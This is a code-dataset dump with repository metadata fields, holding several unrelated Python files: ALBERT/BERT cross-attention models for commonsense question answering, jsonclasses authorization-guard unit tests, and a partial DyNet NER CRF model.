| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
05967a50474dfe54603d24be5644c0ae7fddd275
| 17,141
|
py
|
Python
|
CODE/model/HH_linear.py
|
Zaaachary/CSQA
|
6da6e076f67e9458deacb665d31463db14c7d860
|
[
"BSD-3-Clause"
] | null | null | null |
CODE/model/HH_linear.py
|
Zaaachary/CSQA
|
6da6e076f67e9458deacb665d31463db14c7d860
|
[
"BSD-3-Clause"
] | null | null | null |
CODE/model/HH_linear.py
|
Zaaachary/CSQA
|
6da6e076f67e9458deacb665d31463db14c7d860
|
[
"BSD-3-Clause"
] | null | null | null |
#! -*- encoding:utf-8 -*-
"""
@File : HH_linear.py
@Author : Zachary Li
@Contact : li_zaaachary@163.com
@Dscpt :
"""
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from transformers import (AlbertModel, AlbertPreTrainedModel, BertModel,
BertPreTrainedModel)
from utils import common
class AlbertCrossAttn(AlbertPreTrainedModel):
'''
input_ids [b, 5, seq_len] => [5b, seq_len]
=> PTM
cs_encoding [5b, cs_len, cs_seq_len, hidden]
query_encoding [5b, query_len, hidden] => [5b, cs_len, query_len, hidden]
=> cross_attn
qc_attoutput [5b, cs_len, query_seq_len, hidden]
cq_attoutput [5b, cs_len, cs_seq_len, hidden]
'''
def __init__(self, config, **kwargs):
super(AlbertCrossAttn, self).__init__(config)
# length config
self.cs_num = kwargs['cs_num']
self.max_cs_len = kwargs['max_cs_len']
self.max_qa_len = kwargs['max_qa_len']
# modules
self.albert = AlbertModel(config)
self.cross_att = AttentionLayer(config.hidden_size, self.cs_num)
self.cs_merge = AttentionMerge(config.hidden_size, config.hidden_size//4)
self.qu_merge = AttentionMerge(config.hidden_size, config.hidden_size//4)
self.scorer = nn.Sequential(
nn.Dropout(0.1),
nn.Linear(config.hidden_size * 3, 1)
)
self.init_weights()
def forward(self, input_ids, attention_mask, token_type_ids, labels):
logits = self._forward(input_ids, attention_mask, token_type_ids)
loss = F.cross_entropy(logits, labels)
with torch.no_grad():
logits = F.softmax(logits, dim=1)
predicts = torch.argmax(logits, dim=1)
right_num = torch.sum(predicts == labels)
return loss, right_num
def _forward(self, input_ids=None, attention_mask=None, token_type_ids=None):
# [B, 5, L] => [B * 5, L]
flat_input_ids = input_ids.view(-1, input_ids.size(-1))
flat_attention_mask = attention_mask.view(-1, attention_mask.size(-1))
flat_token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1))
outputs = self.albert(
input_ids = flat_input_ids,
attention_mask=flat_attention_mask,
token_type_ids=flat_token_type_ids
)
pooler_output = outputs.pooler_output # outputs[1] CLS token [5b, hidden]
last_hidden_state = outputs.last_hidden_state # outputs[0] [5b, seq_len, hidden]
# separate query and commonsense encoding
# [C] Q [S] QC [S] C [S] cs_1 [S] ←cs_seq_len cs2 ...[S]
cs_encoding, cs_padding_mask, qa_encoding, qa_padding_mask = self._pad_qacs_to_maxlen(flat_input_ids, last_hidden_state)
# import pdb; pdb.set_trace()
# cross-attn
# [5b, cs_len, query_seq_len, H]
qc_attn_output, qc_attn_weights = self.cross_att(qa_encoding, cs_encoding, cs_padding_mask)
# [5b, cs_len, cs_seq_len, H]
cq_attn_output, cq_attn_weights = self.cross_att(cs_encoding, qa_encoding, qa_padding_mask)
# [5b, cs_len, cs_seq_len, hidden] => [5b, cs_seq_len, hidden]
# [5b, cs_seq_len, hidden] => [5b, hidden]
cs_rep = self.cs_merge(cq_attn_output)
# cs_rep = torch.mean(cq_attoutput,dim = -3)
cs_rep = torch.mean(cs_rep, dim = -2)
# mean pooling query encoding
qu_rep = self.qu_merge(qc_attn_output)
# qu_rep = torch.mean(qc_attoutput, dim = -3)
qu_rep = torch.mean(qu_rep, dim = -2)
final_rep = torch.cat((pooler_output,cs_rep,qu_rep),dim = -1)
logits = self.scorer(final_rep).view(-1, 5)
return logits
def _pad_qacs_to_maxlen(self, flat_input_ids, last_hidden_state):
'''
input
- last_hidden_state [5B, seq_len, hidden]
return
- cs_range_list: [B*5, cs_num] (start, end) sep+1, sep
- qa_range_list: [B*5] (end)
- cs_encoding: [B*5, cs_num, max_cs_len, H]
- qa_encoding: [B*5, cs_num, max_qa_len, H]
- cs_attn_mask
- qa_attn_mask
'''
# Locate SEP token
input_ids = flat_input_ids.cpu().clone().detach().numpy()
sep_ids = input_ids == 3 # sep toekn in albert is 3
sep_locate = [[] for _ in range(len(sep_ids))] # [B*5, seq_num]
for index_1, case in enumerate(sep_ids):
for index_2, token in enumerate(case):
if token:
sep_locate[index_1].append(index_2)
# Get CS, QA range
cs_range_list = [[] for _ in range(len(sep_ids))] # [B*5, cs_num]
qa_range_list = []
for index, case in enumerate(sep_locate):
# Q [S] QC [S] Choice [S] cs_1[S] cs_2[S]
# qa: Q [S] QC [S] Choice [S]; cs: cs_1[S]
qa_range_list.append(case[2]+1)
start = case[2]
for end in case[3:]:
cs_tuple = (start+1, end+1)
start = end
cs_range_list[index].append(cs_tuple)
# Get CS and stack to tensor
hidden_size = last_hidden_state.shape[-1]
cs_batch_list, cs_padding_batch_list = [],[]
for index, case in enumerate(cs_range_list):
cs_case_list = []
cs_padding_list = []
for cs in case:
start, end = cs
pad_len = self.max_cs_len - (end-start)
cs = last_hidden_state[index, start:end, :]
zero = torch.zeros(pad_len, hidden_size, dtype=last_hidden_state.dtype)
zero = zero.to(last_hidden_state.device)
cs_case_list.append(torch.cat((cs, zero), dim=-2))
mask = torch.cat((torch.zeros(cs.shape[:-1]), torch.ones(pad_len))).bool()
mask = mask.to(last_hidden_state.device)
cs_padding_list.append(mask)
cs_batch_list.append(torch.stack(cs_case_list))
cs_padding_batch_list.append(torch.stack(cs_padding_list))
cs_encoding = torch.stack(cs_batch_list)
cs_padding_mask = torch.stack(cs_padding_batch_list)
# Get QA and stack to tensor
qa_batch_list, qa_padding_batch_list = [], []
for index, case in enumerate(qa_range_list):
end = case
pad_len = self.max_qa_len - (end-1)
qa = last_hidden_state[index, 1:end, :] # [CLS] -> [SEP] doesn't contain CLS
zero = torch.zeros(pad_len, hidden_size, dtype=last_hidden_state.dtype)
zero = zero.to(last_hidden_state.device)
qa_batch_list.append(torch.cat((qa, zero), dim=-2))
mask = torch.cat((torch.zeros(qa.shape[:-1]), torch.ones(pad_len))).bool()
mask = mask.to(last_hidden_state.device)
qa_padding_batch_list.append(mask)
qa_encoding = torch.stack(qa_batch_list)
qa_encoding = qa_encoding.unsqueeze(1).expand(-1, self.cs_num, -1, -1)
qa_padding_mask = torch.stack(qa_padding_batch_list)
qa_padding_mask = qa_padding_mask.unsqueeze(1).expand(-1, self.cs_num, -1)
return cs_encoding, cs_padding_mask, qa_encoding, qa_padding_mask
class BertCrossAttn(BertPreTrainedModel):
'''
input_ids [b, 5, seq_len] => [5b, seq_len]
=> PTM
cs_encoding [5b, cs_len, cs_seq_len, hidden]
query_encoding [5b, query_len, hidden] => [5b, cs_len, query_len, hidden]
=> cross_attn
qc_attoutput [5b, cs_len, query_seq_len, hidden]
cq_attoutput [5b, cs_len, cs_seq_len, hidden]
'''
def __init__(self, config, **kwargs):
super(BertCrossAttn, self).__init__(config)
# length config
self.cs_num = kwargs['cs_num']
self.max_cs_len = kwargs['max_cs_len']
self.max_qa_len = kwargs['max_qa_len']
# modules
self.bert = BertModel(config)
self.cross_att = AttentionLayer(config.hidden_size, self.cs_num)
self.cs_merge = AttentionMerge(config.hidden_size, config.hidden_size//2)
self.qu_merge = AttentionMerge(config.hidden_size, config.hidden_size//2)
self.scorer = nn.Sequential(
nn.Dropout(0.1),
nn.Linear(config.hidden_size * 3, 1)
)
self.init_weights()
def forward(self, input_ids, attention_mask, token_type_ids, labels):
logits = self._forward(input_ids, attention_mask, token_type_ids)
loss = F.cross_entropy(logits, labels)
with torch.no_grad():
logits = F.softmax(logits, dim=1)
predicts = torch.argmax(logits, dim=1)
right_num = torch.sum(predicts == labels)
return loss, right_num
def _forward(self, input_ids=None, attention_mask=None, token_type_ids=None):
# [B, 5, L] => [B * 5, L]
flat_input_ids = input_ids.view(-1, input_ids.size(-1))
flat_attention_mask = attention_mask.view(-1, attention_mask.size(-1))
flat_token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1))
outputs = self.bert(
input_ids = flat_input_ids,
attention_mask=flat_attention_mask,
token_type_ids=flat_token_type_ids
)
pooler_output = outputs.pooler_output # outputs[1] CLS token [5b, hidden]
last_hidden_state = outputs.last_hidden_state # outputs[0] [5b, seq_len, hidden]
# separate query and commonsense encoding
# [C] Q [S] QC [S] C [S] cs_1 [S] ←cs_seq_len cs2 ...[S]
cs_encoding, cs_padding_mask, qa_encoding, qa_padding_mask = self._pad_qacs_to_maxlen(flat_input_ids, last_hidden_state)
# import pdb; pdb.set_trace()
# cross-attn
# [5b, cs_len, query_seq_len, H]
qc_attn_output, qc_attn_weights = self.cross_att(qa_encoding, cs_encoding, cs_padding_mask)
# [5b, cs_len, cs_seq_len, H]
cq_attn_output, cq_attn_weights = self.cross_att(cs_encoding, qa_encoding, qa_padding_mask)
# [5b, cs_len, cs_seq_len, hidden] => [5b, cs_seq_len, hidden]
# [5b, cs_seq_len, hidden] => [5b, hidden]
cs_rep = self.cs_merge(cq_attn_output)
# cs_rep = torch.mean(cq_attoutput,dim = -3)
cs_rep = torch.mean(cs_rep, dim = -2)
# mean pooling query encoding
qu_rep = self.qu_merge(qc_attn_output)
# qu_rep = torch.mean(qc_attoutput, dim = -3)
qu_rep = torch.mean(qu_rep, dim = -2)
final_rep = torch.cat((pooler_output,cs_rep,qu_rep),dim = -1)
logits = self.scorer(final_rep).view(-1, 5)
return logits
def _pad_qacs_to_maxlen(self, flat_input_ids, last_hidden_state):
'''
input
- last_hidden_state [5B, seq_len, hidden]
return
- cs_range_list: [B*5, cs_num] (start, end) sep+1, sep
- qa_range_list: [B*5] (end)
- cs_encoding: [B*5, cs_num, max_cs_len, H]
- qa_encoding: [B*5, cs_num, max_qa_len, H]
- cs_attn_mask
- qa_attn_mask
'''
# Locate SEP token
input_ids = flat_input_ids.cpu().clone().detach().numpy()
sep_ids = input_ids == 102 # sep toekn in bert is 102
sep_locate = [[] for _ in range(len(sep_ids))] # [B*5, seq_num]
for index_1, case in enumerate(sep_ids):
for index_2, token in enumerate(case):
if token:
sep_locate[index_1].append(index_2)
# Get CS, QA range
cs_range_list = [[] for _ in range(len(sep_ids))] # [B*5, cs_num]
qa_range_list = []
for index, case in enumerate(sep_locate):
# Q [S] QC [S] Choice [S] cs_1[S] cs_2[S]
# qa: Q [S] QC [S] Choice [S]; cs: cs_1[S]
qa_range_list.append(case[2]+1)
start = case[2]
for end in case[3:]:
cs_tuple = (start+1, end+1)
start = end
cs_range_list[index].append(cs_tuple)
# Get CS and stack to tensor
hidden_size = last_hidden_state.shape[-1]
cs_batch_list, cs_padding_batch_list = [],[]
for index, case in enumerate(cs_range_list):
cs_case_list = []
cs_padding_list = []
for cs in case:
start, end = cs
pad_len = self.max_cs_len - (end-start)
cs = last_hidden_state[index, start:end, :]
zero = torch.zeros(pad_len, hidden_size, dtype=last_hidden_state.dtype)
zero = zero.to(last_hidden_state.device)
cs_case_list.append(torch.cat((cs, zero), dim=-2))
mask = torch.cat((torch.zeros(cs.shape[:-1]), torch.ones(pad_len))).bool()
mask = mask.to(last_hidden_state.device)
cs_padding_list.append(mask)
cs_batch_list.append(torch.stack(cs_case_list))
cs_padding_batch_list.append(torch.stack(cs_padding_list))
cs_encoding = torch.stack(cs_batch_list)
cs_padding_mask = torch.stack(cs_padding_batch_list)
# Get QA and stack to tensor
qa_batch_list, qa_padding_batch_list = [], []
for index, case in enumerate(qa_range_list):
end = case
pad_len = self.max_qa_len - (end-1)
qa = last_hidden_state[index, 1:end, :] # [CLS] -> [SEP] doesn't contain CLS
zero = torch.zeros(pad_len, hidden_size, dtype=last_hidden_state.dtype)
zero = zero.to(last_hidden_state.device)
qa_batch_list.append(torch.cat((qa, zero), dim=-2))
mask = torch.cat((torch.zeros(qa.shape[:-1]), torch.ones(pad_len))).bool()
mask = mask.to(last_hidden_state.device)
qa_padding_batch_list.append(mask)
qa_encoding = torch.stack(qa_batch_list)
qa_encoding = qa_encoding.unsqueeze(1).expand(-1, self.cs_num, -1, -1)
qa_padding_mask = torch.stack(qa_padding_batch_list)
qa_padding_mask = qa_padding_mask.unsqueeze(1).expand(-1, self.cs_num, -1)
return cs_encoding, cs_padding_mask, qa_encoding, qa_padding_mask
class AttentionMerge(nn.Module):
def __init__(self, input_size, attention_size, dropout_prob=0.1):
super(AttentionMerge, self).__init__()
self.attention_size = attention_size
self.hidden_layer = nn.Linear(input_size, self.attention_size)
self.query_ = nn.Parameter(torch.Tensor(self.attention_size, 1))
self.dropout = nn.Dropout(dropout_prob)
self.query_.data.normal_(mean=0.0, std=0.02)
def forward(self, values, mask=None):
"""
H (B, L, hidden_size) => h (B, hidden_size)
(B, L1, L2, hidden_size) => (B, L2, hidden)
"""
if mask is None:
mask = torch.zeros_like(values)
# mask = mask.data.normal_(mean=0.0, std=0.02)
else:
mask = (1 - mask.unsqueeze(-1).type(torch.float)) * -1000.
# values [batch*5, len, hidden] => keys [B, L, atten_size]
keys = self.hidden_layer(values)
keys = torch.tanh(keys)
query_var = torch.var(self.query_) # variance
# (b, l, atten_size) @ (h, 1) -> (b, l, 1)
attention_probs = keys @ self.query_ / math.sqrt(self.attention_size * query_var)
# attention_probs = keys @ self.query_ / math.sqrt(self.attention_size)
attention_probs = F.softmax(attention_probs * mask, dim=1) # [batch*5, len, 1]
attention_probs = self.dropout(attention_probs)
context = torch.sum(attention_probs + values, dim=1) # [batch*5, hidden]
return context
class AttentionLayer(nn.Module):
def __init__(self, hidden_size, cs_num):
super().__init__()
self.hidden_size = hidden_size
self.cs_num = cs_num
self.mult_attn = nn.MultiheadAttention(self.hidden_size, num_heads=1)
def forward(self, query, keyvalue, attn_mask):
'''
input:
- query: [b, cs_num, Lq, hidden]
- keyvalue: [b, cs_num, Lkv, hidden]
output:
- attn_output_weights: [B, cs_num, Lq, Lkv]
- attn_output: [B, cs_num, Lq, H]
'''
q_origin_shape = query.shape
# [B, cs_num, L, H] -> [B * cs_num, L, H] -> [L, B*cs_num, H]
query = query.contiguous().view(-1, query.size(-2), query.size(-1))
query = query.transpose(0, 1)
keyvalue = keyvalue.contiguous().view(-1, keyvalue.size(-2), keyvalue.size(-1))
keyvalue = keyvalue.transpose(0, 1)
# [B, cs_num, L] -> [B*cs_num, L]
attn_mask = attn_mask.contiguous().view(-1, attn_mask.size(-1))
# [Lq, B*cs_num, H], [B*cs_num, Lq, Ls]
attn_output, attn_output_weights = self.mult_attn(query, keyvalue, keyvalue, key_padding_mask=attn_mask)
# [Lq, B*cs_num, H] -> [B*cs_num, Lq, H] -> [B, cs_num, Lq, H]
attn_output = attn_output.transpose(0, 1)
attn_output = attn_output.view(q_origin_shape)
attn_output_weights = attn_output_weights.view(q_origin_shape[0], self.cs_num, -1)
return attn_output, attn_output_weights
| 40.522459
| 128
| 0.606849
| 2,431
| 17,141
| 3.966269
| 0.082271
| 0.018668
| 0.043559
| 0.01452
| 0.816013
| 0.800249
| 0.799212
| 0.799212
| 0.794648
| 0.791122
| 0
| 0.017111
| 0.273788
| 17,141
| 422
| 129
| 40.618483
| 0.75731
| 0.204947
| 0
| 0.731092
| 0
| 0
| 0.003942
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05042
| false
| 0
| 0.02521
| 0
| 0.12605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
553b9ade543749cef72141f9ef1f9bb625cf8b71
| 34
|
py
|
Python
|
document retrieval/proj.py
|
amudalab/concept-graphs
|
59748671dd510bfb6fd1098c99aac048f93e9821
|
[
"MIT"
] | 1
|
2021-02-15T02:09:32.000Z
|
2021-02-15T02:09:32.000Z
|
document retrieval/proj.py
|
amudalab/concept-graphs
|
59748671dd510bfb6fd1098c99aac048f93e9821
|
[
"MIT"
] | null | null | null |
document retrieval/proj.py
|
amudalab/concept-graphs
|
59748671dd510bfb6fd1098c99aac048f93e9821
|
[
"MIT"
] | 4
|
2017-03-07T12:01:58.000Z
|
2019-02-28T10:03:57.000Z
|
def rt(ip):
return [10,15,20]
| 17
| 21
| 0.558824
| 7
| 34
| 2.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0.235294
| 34
| 2
| 21
| 17
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
553b9d245b6070cfef5282c636ae6947a045b267
| 3,033
|
py
|
Python
|
tests/test_can_create.py
|
Jesse-Yung/jsonclasses
|
d40c52aec42bcb978a80ceb98b93ab38134dc790
|
[
"MIT"
] | 50
|
2021-08-18T08:08:04.000Z
|
2022-03-20T07:23:26.000Z
|
tests/test_can_create.py
|
Jesse-Yung/jsonclasses
|
d40c52aec42bcb978a80ceb98b93ab38134dc790
|
[
"MIT"
] | 1
|
2021-11-23T02:12:29.000Z
|
2021-11-23T13:35:26.000Z
|
tests/test_can_create.py
|
Jesse-Yung/jsonclasses
|
d40c52aec42bcb978a80ceb98b93ab38134dc790
|
[
"MIT"
] | 8
|
2021-07-01T02:39:15.000Z
|
2021-12-10T02:20:18.000Z
|
from __future__ import annotations
from unittest import TestCase
from jsonclasses.excs import UnauthorizedActionException
from tests.classes.gs_article import GSArticle, GSAuthor, GSTArticle
from tests.classes.gm_article import GMArticle, GMAuthor
class TestCanCreate(TestCase):
def test_guards_raises_if_no_operator_is_assigned(self):
article = GSArticle(name='P', content='C')
paid_author = GSAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
with self.assertRaises(UnauthorizedActionException):
article.save()
def test_guards_are_called_for_new_objects_on_save(self):
article = GSArticle(name='P', content='C')
paid_author = GSAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
article.opby(paid_author)
article.save()
free_author = GSAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
with self.assertRaises(UnauthorizedActionException):
article.save()
def test_guards_are_not_called_for_existing_objects_on_save(self):
article = GSArticle(name='P', content='C')
setattr(article, '_is_new', False)
paid_author = GSAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
article.opby(paid_author)
article.save()
free_author = GSAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
article.save()
def test_multiple_guards_are_called_for_new_objects_on_save(self):
article = GMArticle(name='P', content='C')
paid_author = GMAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
article.opby(paid_author)
article.save()
free_author = GMAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
with self.assertRaises(UnauthorizedActionException):
article.save()
def test_multiple_guards_are_not_called_for_existing_objects_on_save(self):
article = GMArticle(name='P', content='C')
setattr(article, '_is_new', False)
paid_author = GMAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
article.opby(paid_author)
article.save()
free_author = GMAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
article.save()
def test_types_guard_is_called_for_new_object_on_save(self):
article = GSTArticle(name='P', content='C')
paid_author = GSAuthor(id='P', name='P', paid_user=True)
article.opby(paid_author)
article.save()
free_author = GSAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
with self.assertRaises(UnauthorizedActionException):
article.save()
| 40.44
| 79
| 0.672601
| 377
| 3,033
| 5.135279
| 0.161804
| 0.082645
| 0.046488
| 0.067149
| 0.820248
| 0.820248
| 0.820248
| 0.811983
| 0.811983
| 0.811983
| 0
| 0
| 0.217936
| 3,033
| 74
| 80
| 40.986486
| 0.816189
| 0
| 0
| 0.787879
| 0
| 0
| 0.015826
| 0
| 0
| 0
| 0
| 0
| 0.060606
| 1
| 0.090909
| false
| 0
| 0.075758
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
55491370d800764563ab7ca0e1c5823338e0f27b
| 27,182
|
py
|
Python
|
models/model_builder.py
|
neulab/cmu-ner
|
d35d57fe453d81cc98e3ee55bac58f9ca618f59b
|
[
"BSD-3-Clause"
] | 11
|
2018-04-21T10:25:12.000Z
|
2022-03-27T03:48:25.000Z
|
models/model_builder.py
|
neulab/cmu-ner
|
d35d57fe453d81cc98e3ee55bac58f9ca618f59b
|
[
"BSD-3-Clause"
] | 2
|
2018-06-29T11:02:18.000Z
|
2018-06-29T11:15:24.000Z
|
models/model_builder.py
|
neulab/cmu-ner
|
d35d57fe453d81cc98e3ee55bac58f9ca618f59b
|
[
"BSD-3-Clause"
] | null | null | null |
__author__ = 'chuntingzhou'
from encoders import *
from decoders import *
np.set_printoptions(threshold='nan')
class CRF_Model(object):
def __init__(self, args, data_loader):
self.save_to = args.save_to_path
self.load_from = args.load_from_path
tag_to_id = data_loader.tag_to_id
if args.isLr:
self.constraints = [[[tag_to_id["B-GPE"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-LOC"]]],
[[tag_to_id["B-ORG"]] * 3, [tag_to_id["I-GPE"], tag_to_id["I-PER"], tag_to_id["I-LOC"]]],
[[tag_to_id["B-PER"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-GPE"], tag_to_id["I-LOC"]]],
[[tag_to_id["B-LOC"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-GPE"]]],
[[tag_to_id["O"]] * 4, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-LOC"], tag_to_id["I-GPE"]]],
[[tag_to_id["I-GPE"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-LOC"]]],
[[tag_to_id["I-ORG"]] * 3, [tag_to_id["I-GPE"], tag_to_id["I-PER"], tag_to_id["I-LOC"]]],
[[tag_to_id["I-PER"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-GPE"], tag_to_id["I-LOC"]]],
[[tag_to_id["I-LOC"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-GPE"]]]]
else:
self.constraints = None
# print self.constraints
def forward(self, sents, char_sents, feats, bc_feats, training=True):
raise NotImplementedError
def save(self):
if self.save_to is not None:
self.model.save(self.save_to)
else:
print('Save to path not provided!')
def load(self, path=None):
if path is None:
path = self.load_from
if self.load_from is not None or path is not None:
print('Load model parameters from %s!' % path)
self.model.populate(path)
else:
print('Load from path not provided!')
def cal_loss(self, sents, char_sents, ner_tags, feats, bc_feats, training=True):
birnn_outputs = self.forward(sents, char_sents, feats, bc_feats, training=training)
crf_loss = self.crf_decoder.decode_loss(birnn_outputs, ner_tags)
return crf_loss#, sum_s, sent_s
def eval(self, sents, char_sents, feats, bc_feats, training=False):
birnn_outputs = self.forward(sents, char_sents, feats, bc_feats, training=training)
best_score, best_path = self.crf_decoder.decoding(birnn_outputs)
return best_score, best_path
def eval_scores(self, sents, char_sents, feats, bc_feats, training=False):
birnn_outputs = self.forward(sents, char_sents, feats, bc_feats, training=training)
tag_scores, transit_score = self.crf_decoder.get_crf_scores(birnn_outputs)
return tag_scores, transit_score
class vanilla_NER_CRF_model(CRF_Model):
''' Implement End-to-end Sequence Labeling via Bi-directional LSTM-CNNs-CRF. '''
def __init__(self, args, data_loader):
super(vanilla_NER_CRF_model, self).__init__(args, data_loader)
self.model = dy.Model()
self.args = args
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.cnn_filter_size + args.map_dim
else:
birnn_input_dim = args.cnn_filter_size + args.word_emb_dim
hidden_dim = args.hidden_dim
src_ctx_dim = args.hidden_dim * 2
cnn_filter_size = args.cnn_filter_size
cnn_win_size = args.cnn_win_size
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# for each batch, the length of input seqs are the same, so we don't have bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
birnn_input_dim += bc_dim
self.char_cnn_encoder = CNN_Encoder(self.model, char_emb_dim, cnn_win_size, cnn_filter_size,
0.0, char_vocab_size, data_loader.char_padding_token)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
# print data_loader.word_to_id
# for i in range(len(data_loader.word_to_id)):
# print i, data_loader.id_to_word[i]
# print data_loader.pretrain_word_emb
# print "*************************************"
# for i in range(len(data_loader.word_to_id)):
# print self.word_lookup.lookup_table[i].npvalue()
# raw_input()
self.birnn_encoder = BiRNN_Encoder(self.model, birnn_input_dim, hidden_dim, emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs = self.char_cnn_encoder.encode(char_sents, training=training)
word_embs = self.word_lookup.encode(sents)
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
if self.args.use_brown_cluster:
bc_feat_embs = self.bc_encoder.encode(bc_feats)
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([c, w, f, b]) for c, w, f, b in
zip(char_embs, word_embs, feat_embs, bc_feat_embs)]
elif self.args.use_brown_cluster and not self.args.use_discrete_features:
concat_inputs = [dy.concatenate([c, w, f]) for c, w, f in
zip(char_embs, word_embs, bc_feat_embs)]
elif self.args.use_discrete_features and not self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([c, w, f]) for c, w, f in
zip(char_embs, word_embs, feat_embs)]
else:
concat_inputs = [dy.concatenate([c, w]) for c, w in zip(char_embs, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
return birnn_outputs
class BiRNN_CRF_model(CRF_Model):
''' The same as above, except that we replace the cnn layer for characters with BiRNN layer. '''
def __init__(self, args, data_loader):
self.model = dy.Model()
self.args = args
super(BiRNN_CRF_model, self).__init__(args, data_loader)
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.char_hidden_dim * 2 + args.map_dim
else:
birnn_input_dim = args.char_hidden_dim * 2 + args.word_emb_dim
hidden_dim = args.hidden_dim
char_hidden_dim = args.char_hidden_dim
src_ctx_dim = args.hidden_dim * 2
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# for each batch, the length of input seqs are the same, so we don't have bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
birnn_input_dim += bc_dim
self.char_birnn_encoder = BiRNN_Encoder(self.model,
char_emb_dim,
char_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=0.0,
vocab_size=char_vocab_size,
emb_size=char_emb_dim)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
self.birnn_encoder = BiRNN_Encoder(self.model,
birnn_input_dim,
hidden_dim,
emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
